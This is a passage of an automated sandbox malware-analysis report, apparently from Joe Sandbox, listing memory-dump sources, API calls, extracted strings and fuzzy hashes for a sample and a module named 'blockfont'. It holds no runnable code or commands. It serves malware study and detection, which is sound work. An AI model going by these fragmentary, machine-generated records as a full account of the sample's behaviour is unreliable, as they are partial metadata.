                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID: UNC$\\?\
                                • API String ID: 0-253988292
                                • Opcode ID: 7eb958c4a422c68642043b462608f61d36f18372c6d481a4ea5b2c3964ed32cd
                                • Instruction ID: f50f0a2418415c0d1531ff3b92acdf39411770914d7b17022cc4595fe2c65fd2
                                • Opcode Fuzzy Hash: 7eb958c4a422c68642043b462608f61d36f18372c6d481a4ea5b2c3964ed32cd
                                • Instruction Fuzzy Hash: 12418B35840359ABCF20AF21DC41EAB7BADEF857A0B144067F854E7252E771DAD4CAB0
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID: Shell.Explorer$about:blank
                                • API String ID: 0-874089819
                                • Opcode ID: 73d08ea501fbeaeea30ea7a581823f133fe692c6efaabcb5259c3117638ef20d
                                • Instruction ID: d2897b3d06e79f17a61fad0c374c4b72522d2f8e8c643abddb10f09632667053
                                • Opcode Fuzzy Hash: 73d08ea501fbeaeea30ea7a581823f133fe692c6efaabcb5259c3117638ef20d
                                • Instruction Fuzzy Hash: 782165722143149FDB08DF64C8A592AB7A9FF44721B14C55EF94D8B286EB70EC01CB71
                                APIs
                                  • Part of subcall function 00D6EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D6EB92
                                  • Part of subcall function 00D6EB73: GetProcAddress.KERNEL32(00DA81C0,CryptUnprotectMemory), ref: 00D6EBA2
                                • GetCurrentProcessId.KERNEL32(?,?,?,00D6EBEC), ref: 00D6EC84
                                Strings
                                • CryptUnprotectMemory failed, xrefs: 00D6EC7C
                                • CryptProtectMemory failed, xrefs: 00D6EC3B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AddressProc$CurrentProcess
                                • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                • API String ID: 2190909847-396321323
                                • Opcode ID: f6a909a268a75908105bb5cb10b035a7aa7c28fc1afb258bdbda52f3a6023cd4
                                • Instruction ID: 2d2ec11a583f590bb7b8e8bd3ba174106ec54a7302edeec46a3157fa5f871c92
                                • Opcode Fuzzy Hash: f6a909a268a75908105bb5cb10b035a7aa7c28fc1afb258bdbda52f3a6023cd4
                                • Instruction Fuzzy Hash: 71115B35A04324AFDB159F39DC06A6E3B54EF01720B0A811AFC05AB395DB35AE4197F4
                                APIs
                                • CreateThread.KERNEL32(00000000,00010000,00D709D0,?,00000000,00000000), ref: 00D708AD
                                • SetThreadPriority.KERNEL32(?,00000000), ref: 00D708F4
                                  • Part of subcall function 00D66E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D66EAF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Thread$CreatePriority__vswprintf_c_l
                                • String ID: CreateThread failed
                                • API String ID: 2655393344-3849766595
                                • Opcode ID: f3aa4e61c31fab1e9968396e907e7b18e4697bcc952bc4185f86a9ce56248363
                                • Instruction ID: 797edd4136f85ebf5427e698701765ea3debdf436cad5e3dacaffa5224f17653
                                • Opcode Fuzzy Hash: f3aa4e61c31fab1e9968396e907e7b18e4697bcc952bc4185f86a9ce56248363
                                • Instruction Fuzzy Hash: B00149B1344301AFD724BF54EC81F667B98EF01711F10403EFA8AA22C1DEA1B8409674
                                APIs
                                  • Part of subcall function 00D6DA98: _swprintf.LIBCMT ref: 00D6DABE
                                  • Part of subcall function 00D6DA98: _strlen.LIBCMT ref: 00D6DADF
                                  • Part of subcall function 00D6DA98: SetDlgItemTextW.USER32(?,00D9E154,?), ref: 00D6DB3F
                                  • Part of subcall function 00D6DA98: GetWindowRect.USER32(?,?), ref: 00D6DB79
                                  • Part of subcall function 00D6DA98: GetClientRect.USER32(?,?), ref: 00D6DB85
                                • GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                                • SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                • String ID: 0
                                • API String ID: 2622349952-4108050209
                                • Opcode ID: 17c71f3e430916931e64124b4dfa28e0adf55aa30f18e611559727257fc91fa8
                                • Instruction ID: 0611cceda27d24b29f67a87890d34dafdc66bd2c0b4693778003809ab7334525
                                • Opcode Fuzzy Hash: 17c71f3e430916931e64124b4dfa28e0adf55aa30f18e611559727257fc91fa8
                                • Instruction Fuzzy Hash: 9AF08C3810438DABDF250F608809BBA3B98BB25305F0C8114FD4A947B1C774C995AA74
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000000FF,00D70A78,?), ref: 00D70854
                                • GetLastError.KERNEL32(?), ref: 00D70860
                                  • Part of subcall function 00D66E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D66EAF
                                Strings
                                • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00D70869
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                • API String ID: 1091760877-2248577382
                                • Opcode ID: 4beeed0ac83104984b1f547c0ad96c2c221840a7c2f278483994200cf0021ecc
                                • Instruction ID: 73506b787e667e361c96a690f03c0c376e7bb1a49830050c43a23ffaf0192cbb
                                • Opcode Fuzzy Hash: 4beeed0ac83104984b1f547c0ad96c2c221840a7c2f278483994200cf0021ecc
                                • Instruction Fuzzy Hash: 5BD05E31A081306BCB103B64AC0ADAF7D099F52770F248719F23DA52F6DA22495182F6
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,?,00D6D32F,?), ref: 00D6DA53
                                • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00D6D32F,?), ref: 00D6DA61
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: FindHandleModuleResource
                                • String ID: RTL
                                • API String ID: 3537982541-834975271
                                • Opcode ID: b177d7e905c164584dd2b4ff94f64213ad80fa47d7965f59b955503d78ccbe90
                                • Instruction ID: 47a4fc0496451268ecca4faf62d66d27b5df5903e102900f0a7b23d71b754faf
                                • Opcode Fuzzy Hash: b177d7e905c164584dd2b4ff94f64213ad80fa47d7965f59b955503d78ccbe90
                                • Instruction Fuzzy Hash: 23C0123178935077DB301B607C0DB4329485B10B11F09044DB145DA2D0D5F6C9448670
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 969f2cdd3e7a048a86fb8fe3b4ffefefd446b3798ac7b6d16da23b552d24051f
                                • Instruction ID: 7e1649867f5782b0f5f95be69aae9346c59d3fbff3043432e8ecee9ff7e96553
                                • Opcode Fuzzy Hash: 969f2cdd3e7a048a86fb8fe3b4ffefefd446b3798ac7b6d16da23b552d24051f
                                • Instruction Fuzzy Hash: 82A1C471A0994D8FEB99EB68C8257ADBBE1FF5A310F5002BAD019D72E9DF7468018740
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID: .$R
                                • API String ID: 0-3105842054
                                • Opcode ID: 964582160915fbb67c028f2e670053954e30055f27c990ac37b0d25dfc8b3e5c
                                • Instruction ID: f122d5888076dbeeab4b2a53bdefde13b14484f982dfbe067f612bcdcbccda1e
                                • Opcode Fuzzy Hash: 964582160915fbb67c028f2e670053954e30055f27c990ac37b0d25dfc8b3e5c
                                • Instruction Fuzzy Hash: 0751DA71E19A5E8FDBA8DF18CCA57A9B7B1EF58301F5101E9900DE32A1DA356E81CF40
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID: #$}
                                • API String ID: 0-437702028
                                • Opcode ID: c2c04a9f05cf03fb2a389f110bfa9da2f1f6e6f446a5056cb1dc232bbc04bee8
                                • Instruction ID: 5025935d781d986a23677b3a82c1451bc3dfe6a1b9b36d78c8d828bf6a4f4b04
                                • Opcode Fuzzy Hash: c2c04a9f05cf03fb2a389f110bfa9da2f1f6e6f446a5056cb1dc232bbc04bee8
                                • Instruction Fuzzy Hash: 6421DB30E1952E8FDFA8EF54D8A47F9B7B1EB58301F1101BAD40D92291DB345A80CF40
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID: wM_^
                                • API String ID: 0-505308354
                                • Opcode ID: f669e416949e8fd1f44014ec719e52b58a345af43115434b6be7d1bd82019ba9
                                • Instruction ID: a9e43c636774ff3a899712e623c5eb4493e1bbb2ca8412e1a7c97416d7a00486
                                • Opcode Fuzzy Hash: f669e416949e8fd1f44014ec719e52b58a345af43115434b6be7d1bd82019ba9
                                • Instruction Fuzzy Hash: E6512626F0E51F4AEB697BA8A8284FD7BA0EF48335F060177D51DC60E2DE64355086A0
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 213f1647c4a603cc3047089223556c63451bd776ddb555a5638a392b9ebc4b72
                                • Instruction ID: c7980ab1916064ff799c43e20009dabf0e768f38704d6bc7c941221ee5f5d2ed
                                • Opcode Fuzzy Hash: 213f1647c4a603cc3047089223556c63451bd776ddb555a5638a392b9ebc4b72
                                • Instruction Fuzzy Hash: 5FF19E31E1921E8FDB64EFA8D8646EDBBB0EF49311F1100BAD049D71A2DB386A45CB50
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d5d63ff6c0207de6a2781c2f88aa41e83a27f134b11e36c40dd708ae6c18d3eb
                                • Instruction ID: d8bcf1799137f66a828a39f7befd6d5fd65b978498bb932cbf06e91c9f9768d7
                                • Opcode Fuzzy Hash: d5d63ff6c0207de6a2781c2f88aa41e83a27f134b11e36c40dd708ae6c18d3eb
                                • Instruction Fuzzy Hash: 2FE15F71E19A5D8FDBACEB58C8A4BB8B7B1FF58300F4441B9D01DD32A6DA346944CB41
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 55f0e374e2c43599ea08deac248f613bda26d5b0e1efd884442320c0def61e19
                                • Instruction ID: 173d80a9cf389508d7184659cf9424631784ac6165a245e487a5d03e54e6603f
                                • Opcode Fuzzy Hash: 55f0e374e2c43599ea08deac248f613bda26d5b0e1efd884442320c0def61e19
                                • Instruction Fuzzy Hash: 4D81CF31B0DA494FDBACEF5C88615A977E2EFD8300B15057AE45DC32A6DE34AD028780
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 13ee7140fd2b4200ecf84dc01dd7320334633cedf1e6e3e82bf014dadf899264
                                • Instruction ID: bd32187c827f2d7e278c0945ad0fe58b69ff79ed7921b2c8cd3901bdce4ef8ff
                                • Opcode Fuzzy Hash: 13ee7140fd2b4200ecf84dc01dd7320334633cedf1e6e3e82bf014dadf899264
                                • Instruction Fuzzy Hash: 9381B570E1951D8FEBA4EB98C865BEDB7B1FF58300F5141B9D00DE7295DE346A848B40
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f0cce7eef4aa701dd8cbc828a479a81c1be7f639b06dc8e15a76ace81fee8b32
                                • Instruction ID: efa820031bd812d22e01db43c37bd6bd5a87901419af1a42bf4d37aaba226534
                                • Opcode Fuzzy Hash: f0cce7eef4aa701dd8cbc828a479a81c1be7f639b06dc8e15a76ace81fee8b32
                                • Instruction Fuzzy Hash: 1C71F974E1951D9FEBA8EB98C4647ADB7F1FF58300F1140BAD44DE32A1DE346A808B40
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ec6cec5879cbe357a37f2f0526b18cd7e677309a6f96c10b1e37fc4db8f35af2
                                • Instruction ID: 4561fef7c7713e0dd12e4ed3e9ad2bf4ba1058a78ed13f0b8921a63ecd72bba3
                                • Opcode Fuzzy Hash: ec6cec5879cbe357a37f2f0526b18cd7e677309a6f96c10b1e37fc4db8f35af2
                                • Instruction Fuzzy Hash: 4451D131B19A4A4FDB5CEF5888645BA77E2FFD8300B15467EE45AC7291DE34E8028781
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e430bdc812bfca19db6fdffbb7088eaafd9f8919a272c4ce7a6f82ec0e90f8b1
                                • Instruction ID: d99eda1e38da23fcc224e7cd5f89460a5cbc82dcc1bd46f74d3b38b810de8c0b
                                • Opcode Fuzzy Hash: e430bdc812bfca19db6fdffbb7088eaafd9f8919a272c4ce7a6f82ec0e90f8b1
                                • Instruction Fuzzy Hash: 62412747B0E1B606EB2573ADBC765E93B20DF8137A75E05B3D1DD8A0E3AC08644A82D5
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 05040b40fc1ea6dc635c603d811a0c3299db4f55ae313b0840f27a3d3a90e21d
                                • Instruction ID: b731663383b98a876d0dd6f0dbed128e0574228062556699c2081304ae45db21
                                • Opcode Fuzzy Hash: 05040b40fc1ea6dc635c603d811a0c3299db4f55ae313b0840f27a3d3a90e21d
                                • Instruction Fuzzy Hash: FC514930E0A51E8FEB69EB94D464AEDB7F1FF58301F41017AD009E72A5DA38AA44CB40
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f544b288584022a36c6c993ba55c35d326c3484ca568ad7a2b569f579ae1b6f0
                                • Instruction ID: 1ac00dac9436b7169cc388f6602985ac481f7806c9cd3172faa1e656699d49a6
                                • Opcode Fuzzy Hash: f544b288584022a36c6c993ba55c35d326c3484ca568ad7a2b569f579ae1b6f0
                                • Instruction Fuzzy Hash: B7414931B0E64E4FE769EBB888655B877E0EF4A310B0501FBE45DC71E6DE28B9418341
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 217050fd760d4c67ff0da25c5c68288eb13a8a2c64d2c85801e56f19c64d38f8
                                • Instruction ID: 7bf938a602728b18a64dfa8db488c6af71a43502fbaf5db9a92335062b8d6d6e
                                • Opcode Fuzzy Hash: 217050fd760d4c67ff0da25c5c68288eb13a8a2c64d2c85801e56f19c64d38f8
                                • Instruction Fuzzy Hash: 7241CFA180E7C94FCB439B749C752D53FB0AF17214F0A40DBD488CB0A3E62C5A1AC762
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 327de2ca3473745ce509cf442af448b7c178b4df406240d63557dbc11ed3189e
                                • Instruction ID: 973518d4e1e427ea177b3ae07ee1bdf93c29ba8599888b8e04a171c3566d1984
                                • Opcode Fuzzy Hash: 327de2ca3473745ce509cf442af448b7c178b4df406240d63557dbc11ed3189e
                                • Instruction Fuzzy Hash: A0415C30E1560D8FDB58EFD8D869AEDB7B1FF48300F410179E009E72A6DE3469418B81
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2b6dd0d5f7dac91cff1979fa41f71a9a6e24613540b333f9eeae31b13cc26911
                                • Instruction ID: 1eee55fcb7ef98331f29a3330335d1aaaf38a2712a53509fd751b4ba698eb653
                                • Opcode Fuzzy Hash: 2b6dd0d5f7dac91cff1979fa41f71a9a6e24613540b333f9eeae31b13cc26911
                                • Instruction Fuzzy Hash: 5D31D874E1991D9EEBA8EB98C8A96ADB7B1FF58300F411139D00DE32A2DF2469418B40
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 44fa91aa67509e3e0a7afa8a966df078cfa6623fb83516a1f91b11fa10792d7f
                                • Instruction ID: c4af50fc51b8c112c62867fdd026067c15d072c3934649b9cc43964bcd5e4816
                                • Opcode Fuzzy Hash: 44fa91aa67509e3e0a7afa8a966df078cfa6623fb83516a1f91b11fa10792d7f
                                • Instruction Fuzzy Hash: 4031FB25F0D16B4AEB697BA8A8384FC7B60EF45335F560077D01DC60E3DE5835508A61
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8279df7b6449a2d1beb38f7117927ab91590d9e170369f8d3bde59c805028298
                                • Instruction ID: 96de14e73eadc3be40212b57b570dbe013f81685c3baa8702805d8639e401d2f
                                • Opcode Fuzzy Hash: 8279df7b6449a2d1beb38f7117927ab91590d9e170369f8d3bde59c805028298
                                • Instruction Fuzzy Hash: 67313E3094E7CA4FD753ABB488685A57FF0EF5B314B0A44E7D484CB0B3DA295946C721
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 31df2c6f8b93ee084d476186a8133a743edb612be6655f5ac7f8a7907474eefe
                                • Instruction ID: 5d65e25b027550707a5e70e455ca31215b5ad5ac01e0b7631bafdebeacd88cba
                                • Opcode Fuzzy Hash: 31df2c6f8b93ee084d476186a8133a743edb612be6655f5ac7f8a7907474eefe
                                • Instruction Fuzzy Hash: 3B215E70A0964D9FDB98EF58C4599AD3BF0FF5C304F01016AE41AC72A5DB34E540CB80
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9d1b2ca60714bce57358ca9a64cfd4279d26b7b4543e434b630159dc4686357e
                                • Instruction ID: f42d6c71e7913f503d3765f26cfdac782d33ef31aa248e5f255f2ee126c36944
                                • Opcode Fuzzy Hash: 9d1b2ca60714bce57358ca9a64cfd4279d26b7b4543e434b630159dc4686357e
                                • Instruction Fuzzy Hash: E221D230B0A90F9FEB55FBA888A95FDB7E0FF58304F0145B6D428C30A6EE34A545C240
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a5830bf09627754350c25f3ccddc0bdcc5e68e308d3a8405171b4ccac7a01186
                                • Instruction ID: e3be025c5cb91fbbc9e2dd928579ab033cf8d73027a55647a5031f02de14388b
                                • Opcode Fuzzy Hash: a5830bf09627754350c25f3ccddc0bdcc5e68e308d3a8405171b4ccac7a01186
                                • Instruction Fuzzy Hash: F311B230E2A50E8FE7A4FBA8886A5BD77E1FF58740F4149B6D418D70A6EE34A5448740
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a120ab4b48d21d83ba3ae144ccaa9354d645ca89499d0bc8e49760e0fe6c53b3
